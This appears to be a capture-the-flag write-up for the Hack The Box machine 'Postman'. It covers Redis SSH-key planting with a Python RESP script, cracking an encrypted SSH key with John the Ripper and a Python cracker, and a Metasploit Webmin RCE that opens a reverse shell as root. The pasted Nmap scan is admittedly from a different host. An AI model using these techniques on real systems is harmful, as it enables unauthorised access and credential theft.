Postman

TL;DR

  • Write our SSH public key into the redis user’s authorized_keys through the unauthenticated Redis instance
  • Retrieve a backup of Matt’s passphrase-protected SSH private key from /opt
  • Crack the key’s passphrase with John the Ripper and reuse it as Matt’s password
  • Exploit an authenticated RCE in Webmin 1.910 to get root (Webmin’s web server runs as root)

User.txt

Reconnaissance

Let’s start with an Nmap scan. Note that the output pasted below was captured against a different host (openadmin.htb, 10.10.10.171) and only shows ports 22 and 80; the Postman target used for the rest of this writeup is 10.10.10.160, where Redis (6379) and Webmin (10000) are reachable as well, as the following sections show.

magnussen@funcMyLife:~/postman$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN postman.txt
Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-18 21:21 CET
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:21
Completed NSE at 21:21, 0.00s elapsed
Initiating Ping Scan at 21:21
Scanning 10.10.10.171 [4 ports]
Completed Ping Scan at 21:21, 1.25s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:21
Scanning openadmin.htb (10.10.10.171) [65535 ports]
Discovered open port 80/tcp on 10.10.10.171
Discovered open port 22/tcp on 10.10.10.171
Increasing send delay for 10.10.10.171 from 0 to 5 due to 500 out of 1666 dropped probes since last increase.
Increasing send delay for 10.10.10.171 from 5 to 10 due to max_successful_tryno increase to 4
Increasing send delay for 10.10.10.171 from 10 to 20 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.10.171 from 20 to 40 due to max_successful_tryno increase to 6
Increasing send delay for 10.10.10.171 from 40 to 80 due to max_successful_tryno increase to 7
Increasing send delay for 10.10.10.171 from 80 to 160 due to max_successful_tryno increase to 8
Increasing send delay for 10.10.10.171 from 160 to 320 due to max_successful_tryno increase to 9
Increasing send delay for 10.10.10.171 from 320 to 640 due to max_successful_tryno increase to 10
Warning: 10.10.10.171 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.10.171 from 640 to 1000 due to 278 out of 926 dropped probes since last increase.
Completed SYN Stealth Scan at 21:22, 40.86s elapsed (65535 total ports)
Initiating Service scan at 21:22
Scanning 2 services on openadmin.htb (10.10.10.171)
Completed Service scan at 21:22, 6.10s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.171.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:22
Completed NSE at 21:22, 2.21s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:22
Completed NSE at 21:22, 0.00s elapsed
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up, received timestamp-reply ttl 63 (0.037s latency).
Scanned at 2020-02-18 21:21:41 CET for 50s
Not shown: 65531 closed ports
Reason: 65531 resets
PORT      STATE    SERVICE REASON         VERSION
22/tcp    open     ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VGHiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNKWaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2tPAFPpvipRrLE=
|   256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4
80/tcp    open     http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 21:22
Completed NSE at 21:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 21:22
Completed NSE at 21:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.10 seconds
           Raw packets sent: 200281 (8.812MB) | Rcvd: 136054 (5.442MB)

So on 10.10.10.160 we have four useful ports:

  • SSH (22)
  • Apache (80)
  • Redis (6379)
  • Webmin (10000)

The website is a presentation page, so not much here.

Let’s connect to the Redis instance. If it accepts commands without AUTH, CONFIG GET * dumps its entire runtime configuration:

magnussen@funcMyLife:~/postman$ redis-cli -h 10.10.10.160
10.10.10.160:6379> CONFIG GET *
  1) "dbfilename"
  2) "authorized_keys"
  3) "requirepass"
  4) ""
  5) "masterauth"
  6) ""
  7) "cluster-announce-ip"
  8) ""
  9) "unixsocket"
 10) ""
 11) "logfile"
 12) "/var/log/redis/redis-server.log"
 13) "pidfile"
 14) "/var/run/redis/redis-server.pid"
 15) "slave-announce-ip"
 16) ""
 17) "maxmemory"
 18) "0"
 19) "proto-max-bulk-len"
 20) "536870912"
 21) "client-query-buffer-limit"
 22) "1073741824"
 23) "maxmemory-samples"
 24) "5"
 25) "lfu-log-factor"
 26) "10"
 27) "lfu-decay-time"
 28) "1"
 29) "timeout"
 30) "0"
 31) "active-defrag-threshold-lower"
 32) "10"
 33) "active-defrag-threshold-upper"
 34) "100"
 35) "active-defrag-ignore-bytes"
 36) "104857600"
 37) "active-defrag-cycle-min"
 38) "25"
 39) "active-defrag-cycle-max"
 40) "75"
 41) "auto-aof-rewrite-percentage"
 42) "100"
 43) "auto-aof-rewrite-min-size"
 44) "67108864"
 45) "hash-max-ziplist-entries"
 46) "512"
 47) "hash-max-ziplist-value"
 48) "64"
 49) "list-max-ziplist-size"
 50) "-2"
 51) "list-compress-depth"
 52) "0"
 53) "set-max-intset-entries"
 54) "512"
 55) "zset-max-ziplist-entries"
 56) "128"
 57) "zset-max-ziplist-value"
 58) "64"
 59) "hll-sparse-max-bytes"
 60) "3000"
 61) "lua-time-limit"
 62) "5000"
 63) "slowlog-log-slower-than"
 64) "10000"
 65) "latency-monitor-threshold"
 66) "0"
 67) "slowlog-max-len"
 68) "128"
 69) "port"
 70) "6379"
 71) "cluster-announce-port"
 72) "0"
 73) "cluster-announce-bus-port"
 74) "0"
 75) "tcp-backlog"
 76) "511"
 77) "databases"
 78) "16"
 79) "repl-ping-slave-period"
 80) "10"
 81) "repl-timeout"
 82) "60"
 83) "repl-backlog-size"
 84) "1048576"
 85) "repl-backlog-ttl"
 86) "3600"
 87) "maxclients"
 88) "10000"
 89) "watchdog-period"
 90) "0"
 91) "slave-priority"
 92) "100"
 93) "slave-announce-port"
 94) "0"
 95) "min-slaves-to-write"
 96) "0"
 97) "min-slaves-max-lag"
 98) "10"
 99) "hz"
100) "10"
101) "cluster-node-timeout"
102) "15000"
103) "cluster-migration-barrier"
104) "1"
105) "cluster-slave-validity-factor"
106) "10"
107) "repl-diskless-sync-delay"
108) "5"
109) "tcp-keepalive"
110) "300"
111) "cluster-require-full-coverage"
112) "yes"
113) "cluster-slave-no-failover"
114) "no"
115) "no-appendfsync-on-rewrite"
116) "no"
117) "slave-serve-stale-data"
118) "yes"
119) "slave-read-only"
120) "yes"
121) "stop-writes-on-bgsave-error"
122) "yes"
123) "daemonize"
124) "yes"
125) "rdbcompression"
126) "yes"
127) "rdbchecksum"
128) "yes"
129) "activerehashing"
130) "yes"
131) "activedefrag"
132) "no"
133) "protected-mode"
134) "no"
135) "repl-disable-tcp-nodelay"
136) "no"
137) "repl-diskless-sync"
138) "no"
139) "aof-rewrite-incremental-fsync"
140) "yes"
141) "aof-load-truncated"
142) "yes"
143) "aof-use-rdb-preamble"
144) "no"
145) "lazyfree-lazy-eviction"
146) "no"
147) "lazyfree-lazy-expire"
148) "no"
149) "lazyfree-lazy-server-del"
150) "no"
151) "slave-lazy-flush"
152) "no"
153) "maxmemory-policy"
154) "noeviction"
155) "loglevel"
156) "notice"
157) "supervised"
158) "no"
159) "appendfsync"
160) "everysec"
161) "syslog-facility"
162) "local0"
163) "appendonly"
164) "no"
165) "dir"
166) "/var/lib/redis/.ssh"
167) "save"
168) "900 1 300 10 60 10000"
169) "client-output-buffer-limit"
170) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
171) "unixsocketperm"
172) "0"
173) "slaveof"
174) ""
175) "notify-keyspace-events"
176) ""
177) "bind"
178) "0.0.0.0 ::1"

Redis misconfiguration

Two values stand out: dbfilename is authorized_keys and dir is /var/lib/redis/.ssh. Those are not Redis defaults (the default is dump.rdb in /var/lib/redis); they are leftovers from someone who already ran this trick on the shared box. The actual misconfiguration is further down in the dump: protected-mode is no, requirepass is empty and bind is 0.0.0.0, so anyone who can reach port 6379 can run CONFIG SET and SAVE without authenticating. That turns Redis into an arbitrary file write (with partially controlled content) as the redis user, and /var/lib/redis is that user’s home directory, so we can plant our own SSH public key in its authorized_keys.

SAVE writes the whole RDB dump into the target file, binary header and checksum included. sshd parses authorized_keys line by line and skips lines it cannot parse, so our key is accepted as long as it sits on a line of its own; the blank lines before and after it guarantee that, whatever Redis puts around the value.

The steps: generate a key pair, store the padded public key under any key name, point dir and dbfilename at /var/lib/redis/.ssh/authorized_keys, and SAVE.

magnussen@funcMyLife:~/postman$ ssh-keygen -f postman_ssh
magnussen@funcMyLife:~/postman$ (echo -e "\n\n"; cat postman_ssh.pub; echo -e "\n\n") > postman_ssh.txt
magnussen@funcMyLife:~/postman$ cat postman_ssh.txt | redis-cli -h 10.10.10.160 -x set crackit
OK
magnussen@funcMyLife:~/postman$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> QUIT

sshd reads ~/.ssh/authorized_keys to decide which public keys may log in as that account; since the dump landed in the redis user’s home directory, our key now authorises us as redis. If the login is refused, check permissions first: sshd’s StrictModes rejects an authorized_keys file or .ssh directory that is writable by other users.
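The following is an added example, not part of the original writeup: it reproduces the four redis-cli steps above as raw RESP commands (so the technique works without redis-cli installed) and, more usefully, shows why the blank-line padding matters by running a simplified model of sshd’s authorized_keys parser over a constructed RDB-like dump with and without the padding. The sample public key, the RDB bytes and the host/port are constructed for illustration; only send_commands touches the network and it is not exercised offline.

```python
import base64
import binascii
import socket

# Key types sshd accepts in authorized_keys (subset; enough for this example).
KEY_TYPES = {b"ssh-rsa", b"ssh-ed25519", b"ecdsa-sha2-nistp256",
             b"ecdsa-sha2-nistp384", b"ecdsa-sha2-nistp521"}

# Constructed sample key: a syntactically valid ed25519 wire blob, not a real identity.
_BLOB = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + b"\x11" * 32
SAMPLE_PUBKEY = "ssh-ed25519 " + base64.b64encode(_BLOB).decode() + " attacker@example"


def resp_encode(*args: str) -> bytes:
    """Encode one command as a RESP array, the wire format redis-cli speaks."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        data = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(data), data))
    return b"".join(parts)


def padded_key(pubkey: str) -> str:
    """Surround the key with blank lines so that, once Redis has wrapped it in
    RDB framing, the key still sits on a line of its own."""
    return "\n\n" + pubkey.strip() + "\n\n"


def exploit_commands(pubkey: str, dir_: str = "/var/lib/redis/.ssh",
                     filename: str = "authorized_keys") -> list:
    """The four redis-cli steps from the session above, as RESP-encoded bytes.
    CONFIG SET and SAVE only work because the instance is unauthenticated."""
    return [
        resp_encode("SET", "crackit", padded_key(pubkey)),
        resp_encode("CONFIG", "SET", "dir", dir_),
        resp_encode("CONFIG", "SET", "dbfilename", filename),
        resp_encode("SAVE"),
    ]


def send_commands(host: str, port: int, cmds: list, timeout: float = 5.0) -> bytes:
    """Push the commands over a raw TCP socket and return the replies
    (expect one '+OK' per command). Needs a live target; not run offline."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for cmd in cmds:
            sock.sendall(cmd)
        sock.settimeout(1.0)
        replies = []
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                replies.append(chunk)
        except socket.timeout:
            pass
    return b"".join(replies)


def fake_rdb_dump(value: str) -> bytes:
    """Constructed stand-in for what SAVE writes: RDB magic and metadata, the
    key/value pair, then an EOF marker and checksum. Real dumps differ in
    detail; what matters is that binary bytes surround our value."""
    header = (b"REDIS0009\xfa\tredis-ver\x055.0.7\xfa\nredis-bits\xc0@"
              b"\xfe\x00\xfb\x01\x00\x00\x07crackit")
    trailer = b"\xff\x8a\x1b\x02\x10\xc4\x91\x00\x00"
    return header + value.encode() + trailer


def authorized_key_lines(blob: bytes) -> list:
    """Simplified model of sshd's authorized_keys parser: one key per line,
    blank and comment lines skipped, and a line only counts when its first
    field is a known key type followed by valid base64."""
    accepted = []
    for line in blob.split(b"\n"):
        line = line.strip(b" \t\r")
        if not line or line.startswith(b"#"):
            continue
        fields = line.split()
        if len(fields) < 2 or fields[0] not in KEY_TYPES:
            continue
        try:
            base64.b64decode(fields[1], validate=True)
        except binascii.Error:
            continue
        accepted.append(line)
    return accepted


if __name__ == "__main__":
    for label, value in (("padded", padded_key(SAMPLE_PUBKEY)), ("unpadded", SAMPLE_PUBKEY)):
        print(label, authorized_key_lines(fake_rdb_dump(value)))
    for cmd in exploit_commands(SAMPLE_PUBKEY):
        print(cmd)
```

Without the padding, the key ends up glued to the RDB metadata on the same line, so the first field is not a key type and sshd drops the line; with the padding the key survives as its own line and everything else is discarded as unparseable. The same arbitrary-write primitive works against any file the redis user can write, which is why the real fix is the configuration (requirepass set, bind restricted, protected-mode on, CONFIG renamed away), not the filesystem.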

Let’s see if it works.

magnussen@funcMyLife:~/postman$ ssh -i postman_ssh redis@10.10.10.160
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)

Password cracking

Let’s search for useful things now:

redis@Postman:~$ ls -lha /home/
total 12K
drwxr-xr-x  3 root root 4.0K Sep 11 11:27 .
drwxr-xr-x 22 root root 4.0K Aug 25 15:03 ..
drwxr-xr-x  6 Matt Matt 4.0K Sep 11 11:28 Matt
redis@Postman:~$ ls -alh /opt/
total 12K
drwxr-xr-x  2 root root 4.0K Sep 11 11:28 .
drwxr-xr-x 22 root root 4.0K Aug 25 15:03 ..
-rwxr-xr-x  1 Matt Matt 1.8K Aug 26 00:11 id_rsa.bak
redis@Postman:~$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
[...]
-----END RSA PRIVATE KEY-----

Copy the key to our machine as matt_rsa.txt. The header (Proc-Type: 4,ENCRYPTED with DEK-Info: DES-EDE3-CBC) marks it as a legacy OpenSSL-encrypted PEM key, which ssh2john turns into a hash John the Ripper can attack quickly. Once the passphrase is cracked we also try it as Matt’s login password, betting on reuse.

magnussen@funcMyLife:~/postman$ ./JohnTheRipper/run/ssh2john.py matt_rsa.txt > matt_crack.txt
magnussen@funcMyLife:~/postman$ ./JohnTheRipper/run/john --wordlist=rockyou.txt matt_crack.txt
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (matt_rsa.txt)
1g 0:00:00:08 DONE (2020-02-18 23:25) 0.1168g/s 1675Kp/s 1675Kc/s 1675KC/s ¡Vamos!
Session completed
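An added example, not from the original writeup, showing what ssh2john and john are actually attacking here: a legacy encrypted PEM derives its 3DES key from the passphrase with OpenSSL’s EVP_BytesToKey (MD5, a single iteration, salt taken from the DEK-Info IV), which is what john’s cost line labels “MD5/3DES” and why it runs at over a million candidates per second. The PEM below is constructed with the page’s IV and a dummy body, so no passphrase will open it; the actual 3DES/AES decryption relies on the third-party cryptography package, which is an assumption of this example, and the function returns None if it is absent.

```python
import base64
import hashlib
import re

# Constructed sample: a traditional OpenSSL-encrypted PEM using the IV from the
# page's DEK-Info line and a dummy 32-byte body. It is NOT a real key, so no
# passphrase will decrypt it to valid DER.
SAMPLE_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8=
-----END RSA PRIVATE KEY-----
"""

# cipher name -> (key length, block size) for the DEK-Info ciphers seen in practice
CIPHERS = {"DES-EDE3-CBC": (24, 8), "AES-128-CBC": (16, 16), "AES-256-CBC": (32, 16)}


def parse_legacy_pem(text: str):
    """Split a 'Proc-Type: 4,ENCRYPTED' PEM into (cipher, iv, ciphertext)."""
    m = re.search(r"DEK-Info:\s*([A-Z0-9-]+),([0-9A-Fa-f]+)", text)
    if not m:
        raise ValueError("no DEK-Info header: not a legacy encrypted PEM")
    cipher, iv = m.group(1), bytes.fromhex(m.group(2))
    if cipher not in CIPHERS:
        raise ValueError(f"unsupported cipher {cipher}")
    body = text.split("\n\n", 1)[1].split("-----END", 1)[0]
    return cipher, iv, base64.b64decode("".join(body.split()))


def evp_bytes_to_key(passphrase: bytes, salt: bytes, key_len: int) -> bytes:
    """OpenSSL's EVP_BytesToKey with MD5 and one iteration, the KDF behind all
    legacy PEM encryption: D_i = MD5(D_{i-1} || passphrase || salt[:8]).
    One or two MD5 calls per candidate is why cracking it is so cheap."""
    salt = salt[:8]
    out, prev = b"", b""
    while len(out) < key_len:
        prev = hashlib.md5(prev + passphrase + salt).digest()
        out += prev
    return out[:key_len]


def _decrypt_cbc(cipher: str, key: bytes, iv: bytes, ct: bytes):
    """Raw CBC decryption via the third-party 'cryptography' package (an
    assumption of this example). Returns None if it is not installed."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        try:  # TripleDES moved to the 'decrepit' namespace in recent releases
            from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
        except ImportError:
            TripleDES = algorithms.TripleDES
    except ImportError:
        return None
    algo = TripleDES(key) if cipher == "DES-EDE3-CBC" else algorithms.AES(key)
    dec = Cipher(algo, modes.CBC(iv)).decryptor()
    return dec.update(ct) + dec.finalize()


def looks_like_der_key(plain: bytes, block: int = 8) -> bool:
    """A correct passphrase yields PKCS#5-padded DER: a SEQUENCE tag (0x30)
    with a long-form length (0x81/0x82) and a valid final padding block."""
    if len(plain) < block or plain[0] != 0x30 or plain[1] not in (0x81, 0x82):
        return False
    pad = plain[-1]
    return 1 <= pad <= block and plain.endswith(bytes([pad]) * pad)


def try_passphrases(pem: str, candidates):
    """Return the first candidate that decrypts the key to valid DER, False if
    none does, or None when no cipher backend is available."""
    cipher, iv, ct = parse_legacy_pem(pem)
    key_len, block = CIPHERS[cipher]
    for cand in candidates:
        plain = _decrypt_cbc(cipher, evp_bytes_to_key(cand.encode(), iv, key_len), iv, ct)
        if plain is None:
            return None
        if looks_like_der_key(plain, block):
            return cand
    return False


if __name__ == "__main__":
    import sys  # usage: python crack_pem.py id_rsa.bak rockyou.txt
    with open(sys.argv[1]) as key_file, open(sys.argv[2], encoding="latin-1") as words:
        print(try_passphrases(key_file.read(), (w.rstrip("\n") for w in words)))
```

The defensive lesson is the mirror image: keys generated with ssh-keygen -o (the default since OpenSSH 7.8) use the OpenSSH private key format with a bcrypt KDF and configurable rounds (-a), so a leaked key file costs an attacker orders of magnitude more per guess than this MD5-based scheme.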

Alright, let’s get that user.txt.

magnussen@funcMyLife:~/postman$ ssh -i postman_ssh redis@10.10.10.160
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Feb 18 22:31:47 2020 from 10.10.15.131
redis@Postman:~$ su Matt
Password:
Matt@Postman:/var/lib/redis$ id
uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)
Matt@Postman:/var/lib/redis$ cat /home/Matt/user.txt
517ad0ec2458ca97af8d93aac08a2f3c

I AM ROOT

Webmin RCE

As listed in the port summary above, Webmin listens on port 10000.

Let’s check who owns its files on disk:

Matt@Postman:/var$ ll
total 52
drwxr-xr-x 13 root root   4096 Aug 25 18:24 ./
drwxr-xr-x 22 root root   4096 Aug 25 15:03 ../
drwxr-xr-x  2 root root   4096 Oct 29 09:24 backups/
drwxr-xr-x 11 root root   4096 Aug 25 18:24 cache/
drwxr-xr-x 37 root root   4096 Aug 25 21:24 lib/
drwxrwsr-x  2 root staff  4096 Apr 24  2018 local/
lrwxrwxrwx  1 root root      9 Aug 24 11:24 lock -> /run/lock/
drwxrwxr-x  8 root syslog 4096 Aug 25 22:02 log/
drwxrwsr-x  2 root mail   4096 Aug 24 11:24 mail/
drwxr-xr-x  2 root root   4096 Aug 24 11:24 opt/
lrwxrwxrwx  1 root root      4 Aug 24 11:24 run -> /run/
drwxr-xr-x  4 root root   4096 Aug 24 11:26 spool/
drwxrwxrwt  6 root root   4096 Feb 18 22:39 tmp/
drwx------  4 root bin    4096 Oct 29 09:24 webmin/
drwxr-xr-x  3 root root   4096 Aug 25 20:05 www/

/var/webmin is owned by root with mode 0700, which matches how Webmin works: its miniserv.pl web server runs as root because it administers the system, so any command execution through Webmin is command execution as root. To confirm rather than infer, check the process owner with ps aux | grep miniserv.

Let’s try the Webmin interface.

miniserv speaks TLS by default, so the login page is at https://10.10.10.160:10000 (over plain HTTP it only answers with a notice pointing to the https URL).

Let’s try to log in with Matt’s credentials:

  • Username: Matt
  • Password: computer2008

Webmin reports version 1.910, so let’s search Metasploit for exploits against Webmin 1.910:

msf5 > search Webmin

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  auxiliary/admin/webmin/edit_html_fileaccess  2012-09-06       normal     No     Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
   1  auxiliary/admin/webmin/file_disclosure       2006-06-30       normal     No     Webmin File Disclosure
   2  exploit/linux/http/webmin_backdoor           2019-08-10       excellent  Yes    Webmin password_change.cgi Backdoor
   3  exploit/linux/http/webmin_packageup_rce      2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution
   4  exploit/unix/webapp/webmin_show_cgi_exec     2012-09-06       excellent  Yes    Webmin /file/show.cgi Remote Command Execution
   5  exploit/unix/webapp/webmin_upload_exec       2019-01-17       excellent  Yes    Webmin Upload Authenticated RCE

webmin_packageup_rce (CVE-2019-12840, a command injection in the Package Updates module reachable by any authenticated user allowed to use that module) covers 1.910 and needs only valid credentials, which we have. The module also implements check, so the target can be verified before firing. Let’s try it!

msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > show options
Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME                    yes       Webmin Username
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
PASSWORD => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt
USERNAME => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 10.10.10.160
RHOSTS => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > set SSL true
SSL => true
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 10.10.x.x
LHOST => 10.10.x.x
msf5 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.15.131:4444
[+] Session cookie: eb21c4f55dfe2b5dc78998f05dc284b2
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.15.131:4444 -> 10.10.10.160:58338) at 2020-02-18 23:54:45 +0100
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
a257741c5bed8be7778c6ed95686ddce

This was a nice box, not very difficult, but a good way to start on Hack The Box. Thank you TheCyberGeek for the box!